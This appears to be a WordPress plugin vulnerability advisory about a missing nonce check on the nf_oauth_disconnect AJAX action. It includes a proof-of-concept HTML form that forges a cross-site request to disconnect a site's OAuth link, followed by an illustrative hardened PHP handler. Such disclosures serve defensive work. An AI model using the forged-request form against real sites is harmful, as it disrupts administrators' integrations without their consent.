The plugin's wp_ajax_nf_oauth_disconnect AJAX action had no nonce protection, making it possible for attackers to craft a request that disconnects a site's OAuth connection.
<html>
  <body>
    <form action="https://[URL_HERE]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="nf_oauth_disconnect" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
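A hardened handler for an action of this kind, as an added example that is not the plugin's own code or its actual fix. The action name example_oauth_disconnect, the script handle, the "security" field name and the option name are assumptions chosen for illustration.

```php
<?php
// Added example: hypothetical names, not the plugin's actual code.

// Admin page side: hand a nonce bound to this action and the current user
// to the script that sends the disconnect request.
add_action( 'admin_enqueue_scripts', function () {
    // 'example-oauth-admin' is a hypothetical, already-registered script handle.
    wp_localize_script( 'example-oauth-admin', 'exampleOAuth', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'example_oauth_disconnect' ),
    ) );
} );

// wp_ajax_{action} hooks fire for any logged-in user, so the handler must
// verify both where the request came from and what the caller may do.
add_action( 'wp_ajax_example_oauth_disconnect', 'example_oauth_disconnect' );

function example_oauth_disconnect() {
    // Reject requests without a valid nonce in the 'security' field.
    // Third argument false: return instead of dying, so a JSON error is sent.
    if ( ! check_ajax_referer( 'example_oauth_disconnect', 'security', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }

    // A nonce is not an authorization check; require an administrator capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Hypothetical option holding the stored OAuth credentials.
    delete_option( 'example_oauth_credentials' );
    wp_send_json_success();
}
```

With this check in place, a cross-site form post like the one above carries no valid nonce and is answered with a 403 before any state changes.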
Chloe Chamberland
Chloe Chamberland
Yes
2021-02-16 (about 1 year ago)
2021-02-17 (about 1 year ago)
2021-03-19 (about 1 year ago)